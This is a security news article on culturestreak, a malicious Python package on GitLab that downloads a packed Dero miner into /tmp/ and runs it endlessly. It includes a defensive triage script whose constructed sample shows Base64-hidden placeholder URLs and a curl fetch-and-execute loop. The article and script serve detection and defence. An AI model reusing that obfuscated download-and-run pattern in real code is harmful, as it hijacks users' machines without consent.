Culturestreak Malware Lurks Inside GitLab Python Package

Published: 23/11/2024   Category: security




The GitLab code hijacks computer resources to mine Dero cryptocurrency as part of a larger cryptomining operation.



In what's becoming an all-too-common occurrence in the current threat landscape, security researchers have found yet another malicious open source package, this time an active Python file on GitLab that hijacks system resources to mine cryptocurrency.

The package, called culturestreak, originates from an active repository on the GitLab developer site belonging to a user named Aldri Terakhir, Checkmarx revealed in a blog post on Sept. 19.

If downloaded and deployed, the package runs in an infinite loop that exploits system resources for unauthorized mining of Dero cryptocurrency as part of a larger cryptomining operation, according to Checkmarx.
"Unauthorized mining operations like the one executed by the culturestreak package pose severe risks as they exploit your system's resources, slow down your computer, and potentially expose you to further risks," Checkmarx security researcher Yehuda Gelb wrote in the post.
The finding underscores the existing, persistent supply chain threat posed by opportunistic threat actors who poison open source packages that developers use to build software as a way to reach as many victims as possible with minimal effort.
Earlier this year, Checkmarx even launched a specific threat intelligence API to identify malicious packages before they reach the software supply chain, as a method of defense against this tactic.

Python packages in particular have been a method of choice for hiding malicious payloads, due to the popularity of the open source software platform for building software. Python developers often share code packages online via repositories like GitLab and GitHub, making it an easily accessible ecosystem for threat actors to exploit.

Threat actors have also targeted users of the Python Package Index (PyPI) in a malicious social engineering campaign that aimed to steal their credentials in order to load compromised packages onto the repository itself.
Once deployed, culturestreak decodes several Base64-encoded strings, an obfuscation technique often used to hide sensitive information or to make it more difficult for someone to understand the code's intent.

In its first act of deception, the package decodes variables such as HOST, CONFIG, and FILE, which are then used in the subsequent steps of the operation. The malicious package then sets the FILE variable, which serves as the filename for the downloaded malicious binary, to a random integer ranging from 1 to 999999.

"A possible reason for this is to hamper the ability of antivirus or security software to detect malicious files based on fixed naming conventions," Gelb wrote.

Next, culturestreak attempts to download a binary file called "bwt2," which is saved to the /tmp/ directory, a common location for temporary files on Unix-like systems. Though the researchers couldn't read the binary due to its obfuscation, they managed to reverse-engineer it and found it had been packed with the UPX executable packer, version 4.02.

Once unpacked, the researchers extracted a gcc-built binary that turned out to be astrominer 1.9.2 R4, a known, optimized tool for mining Dero cryptocurrency that is hosted on GitHub.
"As mentioned earlier, the binary is programmed to run in an infinite loop, using hardcoded pool URLs and wallet addresses, indicating a calculated attempt to exploit the system resources for unauthorized mining of cryptocurrency [and] making it a relentless threat that continually exploits system resources," Gelb wrote.

Pool URLs are servers in which multiple users combine their computing power to mine cryptocurrency more efficiently, he explained. "This means that the package is essentially turning your computer into a cog in a larger mining operation without your consent," Gelb added.
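The behaviours described above (Base64-obfuscated HOST/CONFIG/FILE values, a random numeric filename dropped under /tmp/, a UPX-packed binary, and an unconditional loop) are concrete enough to turn into a static triage check that a reviewer can run over a package before installing it. The script below is an added example written for this article; it is not Checkmarx's tooling and not the culturestreak package. The module it scans (SAMPLE_SOURCE) is a constructed stand-in that only mimics the described pattern, with placeholder URLs and a placeholder pool address. The `UPX!` marker check relies on the documented behaviour of UPX, which stamps that ASCII string into files it packs.

```python
"""Static triage for the culturestreak-style pattern: reveal Base64-hidden
assignments without executing the code, flag the described behaviours, and
check a dropped binary for the UPX packer marker.  Added example, not the
real package or the researchers' code."""
import ast
import base64
import re


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# Constructed stand-in for a suspicious module (NOT the real culturestreak
# source). It imitates the article's description: obfuscated HOST/CONFIG,
# a random 1..999999 FILE name, a download into /tmp/, and an endless loop.
# The download URL and pool address are placeholders under .invalid.
SAMPLE_SOURCE = f"""
import base64, os, random
HOST = base64.b64decode("{_b64('http://download.example.invalid/bwt2')}").decode()
CONFIG = base64.b64decode("{_b64('--pool pool.example.invalid:10300')}").decode()
FILE = random.randint(1, 999999)
os.system("curl -s -o /tmp/%s %s" % (FILE, HOST))
while True:
    os.system("/tmp/%s %s" % (FILE, CONFIG))
"""


def find_decoded_literals(source: str) -> dict:
    """Return {variable: plaintext} for assignments of the form
    NAME = base64.b64decode("<literal>")  or  ...b64decode("<literal>").decode().
    Decoding the literals statically shows what the obfuscation hides
    without running the package."""
    found = {}
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Assign) and len(node.targets) == 1
                and isinstance(node.targets[0], ast.Name)):
            continue
        call = node.value
        # Unwrap a trailing .decode() so we reach the b64decode call itself.
        if (isinstance(call, ast.Call) and isinstance(call.func, ast.Attribute)
                and call.func.attr == "decode"):
            call = call.func.value
        if not (isinstance(call, ast.Call) and isinstance(call.func, ast.Attribute)
                and call.func.attr == "b64decode" and call.args
                and isinstance(call.args[0], ast.Constant)
                and isinstance(call.args[0].value, str)):
            continue
        try:
            raw = base64.b64decode(call.args[0].value, validate=True)
        except ValueError:
            continue  # not valid Base64, nothing to reveal
        found[node.targets[0].id] = raw.decode("utf-8", "replace")
    return found


def triage(source: str) -> tuple:
    """Return (decoded_values, findings) for one module's source text.
    Each finding corresponds to a behaviour described in the article."""
    decoded = find_decoded_literals(source)
    findings = []
    if decoded:
        findings.append("base64-obfuscated assignments: " + ", ".join(sorted(decoded)))
    if any(re.search(r"https?://", v) for v in decoded.values()):
        findings.append("decoded literal contains a download URL")
    if re.search(r"random\.randint\(\s*1\s*,\s*999999\s*\)", source):
        findings.append("random numeric filename in the 1..999999 range")
    if "/tmp/" in source:
        findings.append("drops or executes a file under /tmp/")
    if re.search(r"^\s*while\s+True\s*:", source, re.MULTILINE):
        findings.append("unconditional infinite loop")
    return decoded, findings


def is_upx_packed(data: bytes) -> bool:
    """UPX stamps the ASCII marker 'UPX!' into packed files (in the loader
    info block near the start and in the trailing pack header). Absence is
    not proof of a clean file, since the marker can be patched out; treat
    this as a cheap first check before unpacking and hashing."""
    return b"UPX!" in data[:4096] or b"UPX!" in data[-1024:]


if __name__ == "__main__":
    values, hits = triage(SAMPLE_SOURCE)
    for name, value in values.items():
        print(f"{name} decodes to: {value}")
    for hit in hits:
        print("finding:", hit)
    # Constructed header bytes standing in for a packed ELF; not a real binary.
    print("UPX marker present:",
          is_upx_packed(b"\x7fELF" + b"\0" * 60 + b"UPX!" + b"\0" * 100))
```

Run against a package's `.py` files, the decoded values are what you compare with the IoCs the researchers published; the findings list is a prioritisation aid, not a verdict, since legitimate code also uses `/tmp/` and `base64`. The point of decoding statically rather than executing the module is that the obfuscation is only meant to defeat a human skim, not a parser.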
"The discovery of the culturestreak malicious code package serves as yet another reminder of how important it is for developers to always vet code and packages from unverified or suspicious sources," Gelb wrote. Developers also should follow threat-intelligence sources to stay informed of potential threats to their software development.

Checkmarx provided a list of indicators of compromise (IoCs) in Gelb's post to help people identify whether the malicious code package is running its cryptomining payload on their system.
